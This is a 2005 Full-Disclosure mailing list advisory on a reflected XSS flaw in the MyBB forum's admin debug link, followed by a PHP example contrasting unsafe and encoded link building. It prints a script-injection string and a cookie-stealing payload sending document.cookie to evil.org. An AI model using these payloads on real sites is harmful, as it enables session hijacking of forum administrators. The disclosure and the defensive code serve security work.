[Full-disclosure] XSS VULN IN ALL MYBB VERSIONS (INCLUDING PR2)
- To: <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] XSS VULN IN ALL MYBB VERSIONS (INCLUDING PR2)
- From: "Parikh, Dominic" <Dominic.Parikh@xxxxxxxxxxxxxxxxxxxxxxx>
- Date: Mon, 5 Sep 2005 14:15:58 +0100
XSS VULN IN ALL MYBB VERSIONS (INCLUDING PR2)
Vendor: given SEVEN days notice, no patch released!
Just to say, I am appalled with the fact that I contacted MyBB on the 30
August, and was originally not planning to go public.
However, because they have failed to release a patch I have decided to
alert the wider community.
At the bottom of every page shown to the admins is a debug link.
Unfortunately, this fails to properly sanitize user input, so, for
example, you could try:
'forumdisplay.php?fid=2&datecut=""><script>alert(document.cookie)</script>'
Although only admins can exploit this vuln, someone could send them a
link such as
[forumdisplay.php?fid=2&datecut=
<http://www.forum.com/forumdisplay.php?fid=2&datecut=>
""><script>window.location="http://evil.org/steal.php?cookie="+document.cookie</script>]
and ouch!
robokoder
fusionnx.com- The Web Developer's Resource Centre
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
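
The post does not show how MyBB builds the debug link, so the following is an added example (not MyBB code and not part of the original message) of the pattern it describes: a link that reflects request parameters into an `href`, next to a hardened form. The function names, the `debug=1` link format and the assumption that `fid` and `datecut` are meant to be integers are all hypothetical.

```php
<?php
// Added example, not MyBB source. Function names, the "debug=1" link format
// and the integer-only treatment of fid/datecut are assumptions.

// Vulnerable pattern: request parameters are copied into the href verbatim.
function debug_link_unsafe(string $script, array $params): string
{
    $pairs = [];
    foreach ($params as $key => $value) {
        $pairs[] = $key . '=' . $value; // no URL or HTML encoding
    }
    return '<a href="' . $script . '?' . implode('&', $pairs) . '&debug=1">Debug</a>';
}

// Hardened pattern: validate by type, then encode for the URL and for HTML.
function debug_link_safe(string $script, array $params, array $intKeys = ['fid', 'datecut']): string
{
    foreach ($intKeys as $key) {
        if (isset($params[$key])) {
            $params[$key] = (int) $params[$key]; // non-numeric input becomes 0
        }
    }
    $params['debug'] = 1;
    // http_build_query() percent-encodes every key and value.
    $url = $script . '?' . http_build_query($params, '', '&', PHP_QUERY_RFC3986);
    // ENT_QUOTES encodes both quote styles, so the URL stays inside the attribute.
    return '<a href="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '">Debug</a>';
}

// Constructed request carrying the datecut value quoted in the post.
$request = ['fid' => '2', 'datecut' => '""><script>alert(document.cookie)</script>'];

$links = [
    'unsafe'        => debug_link_unsafe('forumdisplay.php', $request),
    'encoding only' => debug_link_safe('forumdisplay.php', $request, []),
    'cast + encode' => debug_link_safe('forumdisplay.php', $request),
];

foreach ($links as $label => $html) {
    // A literal <script> tag in the output means the value escaped the attribute.
    $escaped = strpos($html, '<script>') !== false;
    printf("%-14s breaks out of href: %s\n  %s\n", $label, $escaped ? 'yes' : 'no', $html);
}
```

The "encoding only" row shows that output encoding by itself already keeps the value inside the attribute; the integer cast is a second layer for parameters that should never carry text.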